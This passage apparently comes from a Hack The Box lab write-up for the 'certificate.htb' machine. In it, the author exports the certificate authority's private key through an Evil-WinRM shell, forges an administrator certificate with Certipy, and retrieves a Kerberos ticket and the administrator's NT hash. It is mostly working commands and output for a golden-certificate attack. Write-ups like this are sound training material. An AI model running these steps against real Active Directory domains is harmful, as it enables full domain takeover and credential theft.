  Certificate-LTD-CA
cuLoadKey: LoadKeys returned Keyset does not exist 0x80090016 (-2146893802 NTE_BAD_KEYSET) -- Certificate-LTD-CA
CertUtil: -key command completed successfully.
*Evil-WinRM* PS C:\\Users\\Ryan.K\\Documents> certutil -exportpfx my "75b2f4bbf31f108945147b466131bdca" ca_exported.pfx
my "Personal"
================ Certificate 2 ================
Serial Number: 75b2f4bbf31f108945147b466131bdca
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
 NotBefore: 11/3/2024 3:55 PM
 NotAfter: 11/3/2034 4:05 PM
Subject: CN=Certificate-LTD-CA, DC=certificate, DC=htb
Certificate Template Name (Certificate Type): CA
CA Version: V0.0
Signature matches Public Key
Root Certificate: Subject matches Issuer
Template: CA, Root Certification Authority
Cert Hash(sha1): 2f02901dcff083ed3dbb6cb0a15bbfee6002b1a8
  Key Container = Certificate-LTD-CA
  Unique container name: 26b68cbdfcd6f5e467996e3f3810f3ca_7989b711-2e3f-4107-9aae-fb8df2e3b958
  Provider = Microsoft Software Key Storage Provider
Signature test passed
Enter new password for output file ca_exported.pfx:
Enter new password:
Confirm new password:
CertUtil: -exportPFX command completed successfully.
*Evil-WinRM* PS C:\\Users\\Ryan.K\\Documents> dir

    Directory: C:\\Users\\Ryan.K\\Documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         6/2/2025   6:18 AM           2675 ca_exported.pfx
-a----         6/2/2025   6:16 AM          12288 SeManageVolumeExploit.exe

*Evil-WinRM* PS C:\\Users\\Ryan.K\\Documents> 

• Now we have to transfer the PFX file to our machine, forge an admin certificate

└─$ certipy forge -ca-pfx ca_exported.pfx -upn ADMINISTRATOR@CERTIFICATE.HTB -subject 'CN=ADMINISTRATOR,CN=USERS,DC=CERTIFICATE,DC=HTB'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Saving forged certificate and private key to 'administrator_forged.pfx'
[*] Wrote forged certificate and private key to 'administrator_forged.pfx'

• Now using adminsitartor_forged.pfx we will try authenticate

└─$ certipy auth -pfx administrator_forged.pfx -dc-ip '10.129.249.191'                                   
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'ADMINISTRATOR@CERTIFICATE.HTB'
[*] Using principal: 'administrator@certificate.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certificate.htb': aad3b435b51404eeaad3b435b51404ee:d804304519bf0143c14cbf1c024408c6

• login as administrator, and we have root.txt

    Directory: C:\\Users\\Administrator\\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         6/1/2025   4:45 PM             34 root.txt